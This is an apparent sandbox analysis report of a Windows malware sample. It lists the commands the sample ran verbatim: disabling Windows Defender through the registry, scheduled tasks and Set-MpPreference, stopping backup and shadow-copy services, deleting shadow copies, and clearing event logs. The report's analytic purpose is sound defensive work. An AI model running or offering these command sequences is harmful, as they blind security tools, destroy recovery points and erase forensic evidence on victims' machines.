powershell.exepowershell.exe80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exepid Process 3960 powershell.exe 3960 powershell.exe 4992 powershell.exe 4992 powershell.exe 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid Process Token: SeSecurityPrivilege 3580 wevtutil.exe Token: SeBackupPrivilege 3580 wevtutil.exe Token: SeSecurityPrivilege 2896 wevtutil.exe Token: SeBackupPrivilege 2896 wevtutil.exe Token: SeSecurityPrivilege 3600 wevtutil.exe Token: SeBackupPrivilege 3600 wevtutil.exe Token: SeIncreaseQuotaPrivilege 880 wmic.exe Token: SeSecurityPrivilege 880 wmic.exe Token: SeTakeOwnershipPrivilege 880 wmic.exe Token: SeLoadDriverPrivilege 880 wmic.exe Token: SeSystemProfilePrivilege 880 wmic.exe Token: SeSystemtimePrivilege 880 wmic.exe Token: SeProfSingleProcessPrivilege 880 wmic.exe Token: SeIncBasePriorityPrivilege 880 wmic.exe Token: SeCreatePagefilePrivilege 880 wmic.exe Token: SeBackupPrivilege 880 wmic.exe Token: SeRestorePrivilege 880 wmic.exe Token: SeShutdownPrivilege 880 wmic.exe Token: SeDebugPrivilege 880 wmic.exe Token: SeSystemEnvironmentPrivilege 880 wmic.exe Token: SeRemoteShutdownPrivilege 880 wmic.exe Token: SeUndockPrivilege 880 wmic.exe Token: SeManageVolumePrivilege 880 wmic.exe Token: 33 880 wmic.exe Token: 34 880 wmic.exe Token: 35 880 wmic.exe Token: 36 880 wmic.exe Token: SeIncreaseQuotaPrivilege 4080 wmic.exe Token: SeSecurityPrivilege 4080 wmic.exe Token: SeTakeOwnershipPrivilege 4080 wmic.exe Token: SeLoadDriverPrivilege 4080 wmic.exe Token: SeSystemProfilePrivilege 4080 wmic.exe Token: SeSystemtimePrivilege 4080 wmic.exe Token: SeProfSingleProcessPrivilege 4080 wmic.exe Token: SeIncBasePriorityPrivilege 4080 wmic.exe Token: SeCreatePagefilePrivilege 4080 wmic.exe Token: SeBackupPrivilege 4080 wmic.exe Token: SeRestorePrivilege 4080 wmic.exe Token: SeShutdownPrivilege 4080 wmic.exe Token: SeDebugPrivilege 4080 wmic.exe Token: SeSystemEnvironmentPrivilege 4080 wmic.exe Token: SeRemoteShutdownPrivilege 4080 wmic.exe Token: SeUndockPrivilege 4080 wmic.exe Token: SeManageVolumePrivilege 4080 wmic.exe Token: 33 4080 wmic.exe Token: 34 4080 wmic.exe Token: 35 4080 wmic.exe Token: 36 4080 wmic.exe Token: SeIncreaseQuotaPrivilege 4080 wmic.exe Token: SeSecurityPrivilege 4080 wmic.exe Token: SeTakeOwnershipPrivilege 4080 wmic.exe Token: SeLoadDriverPrivilege 4080 wmic.exe Token: SeSystemProfilePrivilege 4080 wmic.exe Token: SeSystemtimePrivilege 4080 wmic.exe Token: SeProfSingleProcessPrivilege 4080 wmic.exe Token: SeIncBasePriorityPrivilege 4080 wmic.exe Token: SeCreatePagefilePrivilege 4080 wmic.exe Token: SeBackupPrivilege 4080 wmic.exe Token: SeRestorePrivilege 4080 wmic.exe Token: SeShutdownPrivilege 4080 wmic.exe Token: SeDebugPrivilege 4080 wmic.exe Token: SeSystemEnvironmentPrivilege 4080 wmic.exe Token: SeRemoteShutdownPrivilege 4080 wmic.exe Token: SeUndockPrivilege 4080 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid Process procid_target PID 1236 wrote to memory of 4888 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 83 PID 1236 wrote to memory of 4888 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 83 PID 1236 wrote to memory of 4888 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 83 PID 4888 wrote to memory of 1220 4888 net.exe 85 PID 4888 wrote to memory of 1220 4888 net.exe 85 PID 4888 wrote to memory of 1220 4888 net.exe 85 PID 1236 wrote to memory of 3016 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 86 PID 1236 wrote to memory of 3016 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 86 PID 1236 wrote to memory of 3016 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 86 PID 3016 wrote to memory of 4260 3016 net.exe 88 PID 3016 wrote to memory of 4260 3016 net.exe 88 PID 3016 wrote to memory of 4260 3016 net.exe 88 PID 1236 wrote to memory of 3272 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 89 PID 1236 wrote to memory of 3272 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 89 PID 1236 wrote to memory of 3272 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 89 PID 3272 wrote to memory of 1092 3272 net.exe 91 PID 3272 wrote to memory of 1092 3272 net.exe 91 PID 3272 wrote to memory of 1092 3272 net.exe 91 PID 1236 wrote to memory of 1016 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 92 PID 1236 wrote to memory of 1016 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 92 PID 1236 wrote to memory of 1016 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 92 PID 1016 wrote to memory of 3592 1016 net.exe 94 PID 1016 wrote to memory of 3592 1016 net.exe 94 PID 1016 wrote to memory of 3592 1016 net.exe 94 PID 1236 wrote to memory of 1004 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 95 PID 1236 wrote to memory of 1004 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 95 PID 1236 wrote to memory of 1004 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 95 PID 1004 wrote to memory of 1100 1004 net.exe 97 PID 1004 wrote to memory of 1100 1004 net.exe 97 PID 1004 wrote to memory of 1100 1004 net.exe 97 PID 1236 wrote to memory of 2760 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 98 PID 1236 wrote to memory of 2760 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 98 PID 1236 wrote to memory of 2760 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 98 PID 2760 wrote to memory of 5080 2760 net.exe 100 PID 2760 wrote to memory of 5080 2760 net.exe 100 PID 2760 wrote to memory of 5080 2760 net.exe 100 PID 1236 wrote to memory of 3624 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 101 PID 1236 wrote to memory of 3624 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 101 PID 1236 wrote to memory of 3624 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 101 PID 3624 wrote to memory of 3000 3624 net.exe 103 PID 3624 wrote to memory of 3000 3624 net.exe 103 PID 3624 wrote to memory of 3000 3624 net.exe 103 PID 1236 wrote to memory of 212 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 104 PID 1236 wrote to memory of 212 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 104 PID 1236 wrote to memory of 212 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 104 PID 212 wrote to memory of 32 212 net.exe 106 PID 212 wrote to memory of 32 212 net.exe 106 PID 212 wrote to memory of 32 212 net.exe 106 PID 1236 wrote to memory of 4472 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 107 PID 1236 wrote to memory of 4472 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 107 PID 1236 wrote to memory of 4472 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 107 PID 1236 wrote to memory of 4076 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 109 PID 1236 wrote to memory of 4076 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 109 PID 1236 wrote to memory of 4076 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 109 PID 1236 wrote to memory of 4276 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 113 PID 1236 wrote to memory of 4276 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 113 PID 1236 wrote to memory of 4276 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 113 PID 1236 wrote to memory of 4552 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 115 PID 1236 wrote to memory of 4552 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 115 PID 1236 wrote to memory of 4552 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 115 PID 1236 wrote to memory of 2868 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 117 PID 1236 wrote to memory of 2868 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 117 PID 1236 wrote to memory of 2868 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 117 PID 1236 wrote to memory of 4392 1236 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 119
Processes
-
C:\Users\Admin\AppData\Local\Temp\80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe"C:\Users\Admin\AppData\Local\Temp\80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵
- System Location Discovery: System Language Discovery
PID:1220
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵
- System Location Discovery: System Language Discovery
PID:4260
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵
- System Location Discovery: System Language Discovery
PID:1092
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵
- System Location Discovery: System Language Discovery
PID:3592
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1100
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵
- System Location Discovery: System Language Discovery
PID:5080
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3624 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵
- System Location Discovery: System Language Discovery
PID:3000
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_289a0" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_289a0" /y3⤵
- System Location Discovery: System Language Discovery
PID:32
-
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4472
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4076
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4276
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4552
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2868
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4392
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3512
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_289a0" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4900
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2032
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:1660
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:2608
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:1960
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:4252
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3152
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3484
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3916
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:364
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:4420
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:3796
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:4864
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:4804
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:4104
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:3388
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:3588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:4692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:4380
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:3480
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:3604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:2476
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2420
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:1748
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵
- System Location Discovery: System Language Discovery
PID:2264
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:3012
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:528
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:2548
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2688
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2564
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:4048
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:772
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:4228
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:4244
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3580
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3600
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵
- System Location Discovery: System Language Discovery
PID:3024
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵
- System Location Discovery: System Language Discovery
PID:4356 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3960
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- System Location Discovery: System Language Discovery
PID:2008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4992
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Windows Management Instrumentation
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
1Indicator Removal
2Clear Windows Event Logs
1File Deletion
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51ca4bccdc072b810cb3f0080d616317a
SHA180dea435c073d9b0a2a54a853df4dc058ebd3352
SHA25648f9f649dfdf74a453d0229070bfdadd27c93e014f56cf36992758b70350e169
SHA512fcacc4812f6cd93cb91a5e502fe3571eefba692defdd52f67b55cad3790405535ff156ba87360dcccd86e0766e03ddbd6a1c547b7cd40d1f32ccf7e51dfc4488
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD51b46397893b60c5d1967582214967594
SHA1dff1583d188e0c13494035607f429b6d39464866
SHA256d89e49d3f5126afb404393724d37d0e0f484a28a25434fea7652c293888af531
SHA512c6c9375406f048eca8c1c20364dbe661c048567480c4c858abb62276b790987064b808d264d2fbcd3f443349be229a848896a63ca7acf0fa7df5817c3f2a982b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82